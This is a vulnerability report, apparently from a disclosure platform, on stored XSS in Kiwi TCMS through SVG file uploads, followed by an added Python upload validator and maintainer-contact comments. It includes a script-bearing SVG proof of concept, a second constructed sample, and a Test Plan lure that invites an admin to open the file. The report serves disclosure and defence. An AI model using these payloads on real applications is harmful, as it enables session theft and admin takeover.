Stored XSS in kiwiTCMS in kiwitcms/kiwi
Reported on
Nov 23rd 2022
Description
Stored XSS, also known as persistent XSS, is the more damaging type of XSS. It occurs when a malicious script is injected directly into a vulnerable web application. Due to a sanitization problem it is possible to perform a stored XSS here: the upload function permits dangerous extensions such as .svg files. Through this stored XSS it is probably possible to become admin and to perform other malicious actions using the API endpoint; I will try later on a local instance and I will let you know.
Not sanitizing extensions could lead to more serious things, such as SSRF or RCE. I didn't test those; I stopped as soon as I saw that you could upload SVG files.
Proof of Concept
1 - Upload a malicious SVG file; a link to the new file will be generated on the server.
Upload this file (save it with a .svg extension):
<?xml version="1.0" encoding="utf-8"?>
<!-- Svg Vector Icons : http://www.onlinewebfonts.com/icon -->
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 1000 1000" enable-background="new 0 0 1000 1000" xml:space="preserve">
<metadata> Svg Vector Icons : http://www.onlinewebfonts.com/icon </metadata>
<g><g transform="translate(0.000000,511.000000) scale(0.100000,-0.100000)"><path d="M974.7,3376.1c-105.3-28.7-212.5-120.6-260.3-222c-26.8-61.3-30.6-327.3-36.4-2894.1l-3.8-2829H387.1H100v-111v-109.1l250.7-197.1l250.7-195.2H5000h4398.5l250.8,195.2l250.7,197.1v109.1v111h-287.1h-287.1V206.5c0,1965.7-5.7,2802.2-21,2873c-28.7,135.9-139.7,254.6-271.8,294.8c-84.2,24.9-585.7,28.7-4031,26.8C1847.5,3401,1047.5,3395.3,974.7,3376.1z M8985.1,3062.2c21.1-21.1,24.9-553.2,24.9-2823.2v-2798.4l-1560-5.7l-1561.9-3.8l-34.5-67c-21-38.3-68.9-86.1-105.3-111c-67-42.1-78.5-42.1-748.4-42.1c-648.9,0-683.3,1.9-746.5,38.3c-36.4,23-84.2,72.7-105.3,111l-38.3,70.8H2557.7H1003.4l-9.6,61.3c-15.3,80.4-15.3,5443.6-1.9,5514.4c5.7,30.6,28.7,61.3,51.7,70.8c24.9,9.6,1770.5,15.3,3979.3,13.4C8223.3,3087.1,8964,3083.3,8985.1,3062.2z"/><path d="M1296.3,2786.6c-5.7-13.4-7.7-1152.3-5.7-2532.3l5.7-2507.4H5000h3703.7V273.4V2800l-3699.9,5.7C2054.3,2809.6,1302,2805.7,1296.3,2786.6z M5415.4,2269.8c-3.8-13.4-157-409.6-340.7-880.5l-329.2-857.5h-84.2h-82.3l36.4,91.9c19.1,49.8,172.3,446,338.8,880.5l302.4,788.6h84.2C5400,2292.8,5423,2285.1,5415.4,2269.8z M4425.8,1833.4v-76.6l-482.3-241.2l-484.3-241.2l478.5-243.1l478.5-241.2l5.7-80.4c3.8-45.9,0-82.3-5.7-82.3s-266.1,130.2-576.1,290.9l-564.6,289l5.7,68.9l5.7,67l545.5,283.3c300.5,155,557,283.3,570.4,283.3C4416.2,1910,4425.8,1881.3,4425.8,1833.4z M6167.6,1628.6l555.1-283.3v-70.8v-68.9l-562.7-289c-310.1-158.9-570.4-289-576.1-289s-9.6,36.4-5.7,82.3l5.7,80.4l488.1,241.2l488.1,241.2l-491.9,245l-493.8,245v72.7c0,42.1,9.6,74.6,21,74.6C5604.8,1910,5863.2,1783.6,6167.6,1628.6z M4425.8,24.6v-86.1h-488.1h-488.1v86.1v86.1h488.1h488.1V24.6z M5245,30.4l-5.7-82.3l-157-5.7l-158.9-5.8v88.1v86.1H5088h162.7L5245,30.4z M6052.7,24.6v-88.1l-157,5.8l-158.9,5.7l-5.7,82.3l-5.7,80.4h162.7h164.6V24.6z M4100.4-300.8v-86.1H3775h-325.4v86.1v86.1H3775h325.4V-300.8z M5076.6-300.8v-86.1h-325.4h-325.4v86.1v86.1h325.4h325.4V-300.8z M5899.6-300.8v-86.1h-325.4h-325.4v86.1v86.1h325.4h325.4V-300.8z 
M6875.8-300.8v-86.1h-325.4H6225v86.1v86.1h325.4h325.4V-300.8z M4253.5-654.9v-76.6h-306.3H3641v76.6v76.6h306.2h306.3V-654.9z M4100.4-951.6v-86.1H3775h-325.4v86.1v86.1H3775h325.4V-951.6z M5076.6-951.6v-86.1h-239.3H4598v86.1v86.1h239.3h239.3V-951.6z M5076.6-1276.9v-86.1h-813.5h-813.5v86.1v86.1h813.5h813.5V-1276.9z M6225-1276.9v-86.1h-325.4h-325.4v86.1v86.1h325.4H6225V-1276.9z M5245-1606.2l5.7-82.3H4265h-987.7v72.7c0,40.2,5.7,80.4,13.4,86.1c5.7,7.7,447.9,11.5,980,9.6l968.5-5.7L5245-1606.2z M6550.4-1602.3v-86.1H6225h-325.4v86.1v86.1H6225h325.4V-1602.3z"/></g></g>
<script type="text/javascript">
alert(document.cookie);
</script>
</svg>
2 - Insert something like this into a Test Plan:
## ADMIN PLEASE OPEN THE LINK
[!link](/uploads/attachments/testplans_testplan/2/Open.svg)

Now, when an admin or another user opens the link, the XSS will be triggered.
POC Video:
https://drive.google.com/file/d/18y3-EJZMgpehIZufnlOxf8bqdRY5KK-3/view?usp=share_link
Impact
Stored XSS to run malicious JavaScript. Probably also the possibility of becoming admin and of using other API endpoints without permission.
Occurrences
get.js L205
filter file extensions in file upload
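The report's remediation hint is to filter extensions on upload and check the file type. The following validator is an added example for this page, not Kiwi TCMS code: the allowlist, the `check_upload`/`svg_has_active_content`/`serving_headers` names and the sample files are all assumptions constructed here. It rejects filenames that are not a single safe path component, enforces an extension allowlist, checks magic bytes against the claimed extension, and for SVG (which is XML and may carry scripts) refuses any file containing script or foreignObject elements, on* handlers or javascript: URLs. Because a script inside an SVG runs when the browser navigates to the file as a document, which is exactly what the Test Plan link in step 2 makes a user do, every accepted file is also meant to be served with `Content-Disposition: attachment`, `X-Content-Type-Options: nosniff` and a restrictive CSP as defence in depth. The parser is the standard library's ElementTree; a production deployment should use defusedxml so entity expansion is blocked as well.

```python
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

# Constructed allowlist for this example; the real Kiwi TCMS allowlist is not on the page.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf", "txt", "svg"}

# Magic-byte prefixes used to confirm the body matches the claimed extension.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
    "pdf": b"%PDF-",
}

CONTENT_TYPES = {
    "png": "image/png", "jpg": "image/jpeg", "jpeg": "image/jpeg",
    "gif": "image/gif", "pdf": "application/pdf", "txt": "text/plain",
    "svg": "image/svg+xml",
}

# One path component: alphanumeric start, no slashes, no control characters.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,99}")


@dataclass
class Verdict:
    accepted: bool
    reason: str
    headers: dict = field(default_factory=dict)  # headers to use when serving the file


def svg_has_active_content(data: bytes) -> bool:
    """True if the SVG carries script/foreignObject elements, on* event
    handlers or javascript: URLs. Raises ET.ParseError on malformed XML.
    (Use defusedxml.ElementTree in production to also block entity expansion.)"""
    root = ET.fromstring(data)
    for el in root.iter():
        tag = el.tag.rsplit("}", 1)[-1].lower()  # drop the {namespace} prefix
        if tag in ("script", "foreignobject"):
            return True
        for name, value in el.attrib.items():
            local = name.rsplit("}", 1)[-1].lower()  # covers xlink:href as well
            if local.startswith("on"):
                return True
            if local == "href" and value.strip().lower().startswith("javascript:"):
                return True
    return False


def serving_headers(ext: str) -> dict:
    """Headers that keep an attachment from executing in the application's origin:
    force a download, forbid MIME sniffing, and deny scripts if rendered anyway."""
    return {
        "Content-Type": CONTENT_TYPES[ext],
        "Content-Disposition": "attachment",
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


def check_upload(filename: str, data: bytes) -> Verdict:
    """Validate an upload by name, extension, magic bytes and (for SVG) content."""
    if not SAFE_NAME.fullmatch(filename):
        return Verdict(False, "filename is not a single safe path component")
    if "." not in filename:
        return Verdict(False, "filename has no extension")
    ext = filename.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return Verdict(False, f"extension .{ext} is not allowed")
    magic = MAGIC.get(ext)
    if magic is not None and not data.startswith(magic):
        return Verdict(False, f"content does not look like {ext}")
    if ext == "svg":
        try:
            if svg_has_active_content(data):
                return Verdict(False, "svg contains script or event handlers")
        except ET.ParseError:
            return Verdict(False, "svg is not well-formed XML")
    return Verdict(True, "ok", serving_headers(ext))


# Constructed samples (not the report's file): a script-bearing SVG and a clean icon.
MALICIOUS_SVG = (b'<?xml version="1.0" encoding="utf-8"?>\n'
                 b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">'
                 b'<rect width="10" height="10"/><script>alert(document.cookie)</script></svg>')
CLEAN_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" '
             b'xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 10 10">'
             b'<rect width="10" height="10"/></svg>')

if __name__ == "__main__":
    for name, body in [("Open.svg", MALICIOUS_SVG), ("icon.svg", CLEAN_SVG),
                       ("shell.php", b"<?php"), ("pic.png", b"not really a png"),
                       ("../pic.png", b"\x89PNG\r\n\x1a\n")]:
        v = check_upload(name, body)
        print(f"{name:12} accepted={v.accepted} reason={v.reason}")
```

The element and attribute checks are a denylist and deliberately a second line of defence; the durable control is refusing to render attachments inline at all (the attachment disposition plus nosniff), so that a file which slips past the content check still cannot run in the application's origin.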
@admin Any update? If he needs some tips on how to avoid the file upload vulnerability, I can help him in the process.
No update, but the Kiwi team is on the platform. Feel free to reach out to them via other channels (Twitter, GH, email).
@admin Could you try to contact the team and see if it is possible to have news? I can't get in touch. In the coming days I would like to analyze the application again, or in any case some other open source framework here on the portal, as soon as this vulnerability is resolved; for now I'm dedicating myself to work. I think it's enough to add a strong regex on the name of the uploaded file to solve the problem, and possibly check the type, but if I can't get any feedback from them I can't possibly even help them.
Hi Antonio, we have exhausted our outreach efforts to the maintainer; we recommend you try to reach out to the maintainer yourself and try to get their attention to this report. Thanks!
@kiwi @kiwitcms maintainer, is it possible to obtain a CVE? It's a stored XSS that, with the right payload, allows an attacker to become the administrator.